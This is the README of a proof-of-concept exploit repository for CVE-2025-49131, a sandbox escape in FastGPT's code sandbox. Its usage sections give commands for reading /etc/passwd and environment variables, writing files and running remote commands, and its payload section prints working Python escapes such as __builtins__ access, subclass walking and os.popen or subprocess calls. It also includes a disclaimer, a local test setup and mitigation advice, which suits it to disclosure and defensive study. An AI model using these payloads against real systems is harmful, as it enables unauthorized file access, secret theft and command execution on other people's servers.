# CVE-2025-49131 - FastGPT Sandbox Escape POC

```
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Affected: < v4.9.11             ║
        ╚═══════════════════════════════════════╝
```

## 🎯 Vulnerability Overview

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-49131 |
| **CVSS Score** | 6.3 (Medium) |
| **CVSS Vector** | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| **Vulnerability Type** | Sandbox Escape |
| **Affected Software** | FastGPT (fastgpt-sandbox container) |
| **Affected Versions** | < 4.9.11 |
| **Patched Version** | 4.9.11+ |
| **Disclosure Date** | June 9, 2025 |

## ⚠️ Disclaimer

**This tool is for authorized security research and educational purposes only.**

- Only test on systems you own or have explicit written permission to test
- Follow responsible disclosure practices
- Comply with all applicable laws and regulations

## 📖 Description

CVE-2025-49131 is a sandbox escape vulnerability in FastGPT's `fastgpt-sandbox` container. The vulnerability exists due to:

- **Insufficient isolation mechanisms** - The sandbox doesn't properly restrict Python builtins
- **Overly permissive system calls** - Dangerous syscalls are not blocked
- **Inadequate code execution restrictions** - Import restrictions can be bypassed

### Impact

Successful exploitation allows an attacker to:

- ✅ **Read arbitrary files** - Access /etc/passwd, configuration files, secrets
- ✅ **Write arbitrary files** - Modify system files, inject malicious code
- ✅ **Bypass Python import restrictions** - Import os, subprocess modules
- ✅ **Potential RCE** - Execute system commands via imported modules

## 🚀 Quick Start

```bash
# Clone this repository
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Install dependencies
pip install -r requirements.txt

# Run vulnerability detection
python poc.py --target http://localhost:3001 --detect

# Read a file
python poc.py --target http://localhost:3001 --read /etc/passwd

# Attempt RCE
python poc.py --target http://localhost:3001 --rce "id"
```

## 🔧 Setup Vulnerable Environment

```bash
# Start vulnerable and patched containers
docker-compose up -d

# Vulnerable sandbox on port 3001
# Patched sandbox on port 3002
```

## 💻 Usage

### Detection Mode (Non-destructive)
```bash
python poc.py --target http://localhost:3001 --detect -v
```

### Read Arbitrary Files
```bash
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ
```

### Write Files
```bash
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"
```

### Import Bypass
```bash
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess
```

### Environment Variables
```bash
python poc.py --target http://localhost:3001 --env
```

### Remote Code Execution
```bash
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"
```

### Full Options
```bash
python poc.py --help
```

## 📁 Project Structure

```
cve-2025-49131-poc/
├── poc.py                # Main exploit script
├── payloads.py           # Payload generator library
├── docker-compose.yml    # Test environment
├── requirements.txt      # Python dependencies
├── README.md             # This file
└── tests/
    └── test_exploit.py   # Automated tests
```

## 🔬 Technical Details

### Vulnerability Root Cause

The FastGPT sandbox is designed to execute user-submitted code in an isolated environment. However, the isolation mechanisms are insufficient:

1. **Python `__builtins__` Access** - The sandbox doesn't properly restrict access to built-in functions like `open()`, `__import__()`, etc.

2. **Syscall Filtering** - The allowed syscall list includes dangerous calls that enable file system access

3. **Import Restrictions Bypass** - Multiple techniques exist to bypass module import restrictions

### Exploitation Flow

```
┌─────────────────────────────────────────────┐
│ 1. Send malicious code to sandbox API       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Bypass sandbox restrictions using:       │
│    - __builtins__ manipulation              │
│    - Subclass walking                       │
│    - Import bypass techniques               │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Gain access to:                          │
│    - File system (read/write)               │
│    - os/subprocess modules                  │
│    - Environment variables                  │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Impact:                                  │
│    - Data exfiltration                      │
│    - Code injection                         │
│    - Remote command execution               │
└─────────────────────────────────────────────┘
```

### Example Payloads

**File Read:**
```python
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()
```

**Import Bypass:**
```python
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__']('os')
```

**RCE:**
```python
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)
```

## 🛡️ Detection & Mitigation

### Detection

Look for suspicious activity in sandbox logs:
- Attempts to access `/etc/passwd`, `/etc/shadow`
- Calls to `__builtins__`, `__import__`
- Subprocess or os module usage
- Unusual file read/write operations

### Mitigation

1. **Upgrade FastGPT** to version 4.9.11 or later
2. **Network isolation** - Limit sandbox container network access
3. **Resource limits** - Apply CPU/memory limits to containers
4. **Monitoring** - Implement logging and alerting for sandbox activities

## 📚 References

- [NVD - CVE-2025-49131](https://nvd.nist.gov/vuln/detail/CVE-2025-49131)
- [FastGPT GitHub](https://github.com/labring/FastGPT)
- [GitHub Security Advisory](https://github.com/labring/FastGPT/security/advisories)
- [FastGPT Documentation](https://doc.fastgpt.in/)

## ⏱️ Timeline

| Date | Event |
|------|-------|
| 2025-??-?? | Vulnerability Discovered |
| 2025-??-?? | Vendor Notified |
| 2025-06-?? | Patch Released (v4.9.11) |
| 2025-06-09 | Public Disclosure |

## 📄 License

This project is for educational and authorized security research purposes only. Use responsibly.

---

**Created for security research purposes. Always obtain proper authorization before testing.**
